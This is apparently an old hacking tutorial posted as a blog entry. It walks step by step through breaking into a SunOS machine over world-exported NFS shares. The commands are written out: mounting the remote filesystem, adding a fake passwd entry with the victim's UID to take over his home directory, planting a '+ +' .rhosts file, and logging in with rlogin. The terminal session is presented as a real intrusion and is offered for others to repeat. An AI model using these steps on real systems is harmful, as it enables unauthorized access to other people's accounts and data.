Mount the drives
Ok, now on to mounting the drives ....
lets say we did a showmount -e domain.com and got back:
Export list for domain.com:
/ (everyone)
/p1 (everyone)
/p2 (everyone)
/p3 (everyone)
/p5 (everyone)
/p6 (everyone)
/p7 (everyone)
/var/spool/mail titan,europa,galifrey
/tmp (everyone)
We would want to mount / .. yup .... this guy has his entire system mountable!
$root> mkdir /tmp/mount
$root> mount -nt nfs domain.com:/ /tmp/mount
If he had the home directory mountable the command would be:
$root> mount -nt nfs domain.com:/home /tmp/mount
To unmount the system, make sure you are out of the directory and type:
$root> umount /tmp/mount
Make sure you make the mount directory first, you can make this anywhere on the
system that you want. If the systems /mnt directory is empty you can use it
also.
Ok this is for real:
bash# ls -al /mnt ; making sure the mnt dir is empty
ls: /mnt: No such file or directory ; there was not even a dir there ;)
bash# mkdir /mnt ; lets make one for them
bash# mount -nt nfs xxxxxx.xxx:/export/usr /mnt ; let's mount the sucker ...
bash# cd /mnt ; changing to the mounted drive...
bash# ls ; just the plain dir ..
TT_DB home raddb share
back local radius-961029.gz www
exec lost+found radius-961029.ps
bash# ; there is is up there, the home dir ... oh good ...
bash# cd home
bash# ls -l ; long directory listing ... tom is looking good here ;)
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 302 other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 viewx
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash# ; notice tom is user number 302 ... hmmm lets put him in our passwd file
bash# pico /etc/passwd
tom:x:302:2::/home:/bin/bash ; this should do it ;)
bash# su - tom ; su to the tom account ...
bash$ ls -l
total 18
drwxr-xr-x 2 judy other 512 Feb 1 10:41 garry
drwxr-xr-x 69 infobahn other 5632 Mar 10 01:42 horke
drwxr-xr-x 11 301 other 2048 Mar 1 10:25 jens
drwxr-xr-x 2 300 other 512 Oct 15 07:45 joerg
drwxr-xr-x 2 604 other 512 Feb 8 13:00 mailadmin
drwxr-xr-x 2 melissa other 512 Sep 27 06:15 mk
drwxr-xr-x 6 news news 512 Mar 6 1996 news
drwxr-xr-x 2 303 other 512 Jan 24 04:17 norbert
drwxr-xr-x 4 jim other 512 Sep 27 06:16 pauk
drwxr-xr-x 2 tom other 512 Mar 1 10:10 tom
drwxr-xr-x 5 601 daemon 512 Jan 26 1996 view
drwxr-xr-x 10 15 audio 512 Oct 17 08:03 www
bash$ ; NOTICE above that toms user number is gone ... we now own his dir!
bash$ echo + +>>tom/.rhosts ; this will make a file in his dir called .rhosts
bash$ ;inside .rhosts will be wild cards + + for anyone to rlogin to his account
bash$ rlogin xxxxx.xxx we are tom on our machine, so lets just rlogin plain.
Last login: Fri Mar 7 00:16:03 from xxxxx.xxxxxxxxxx
Sun Microsystems Inc. SunOS 5.5 Generic November 1995
> ; yup we are in!
> ls -al
total 8
drwxr-xr-x 2 tom group 512 Mar 1 17:10 .
drwxr-xr-x 14 tom group 512 Jan 24 11:16 ..
-rw-r--r-- 1 tom group 144 Dec 30 15:32 .proofile
-rw-r--r-- 1 tom bin 8 Mar 11 08:26 .rhoosts
>
So now we have access, so lets just hack this system ... oops, that is another
lesson! Have pun!
0 comments:
Post a Comment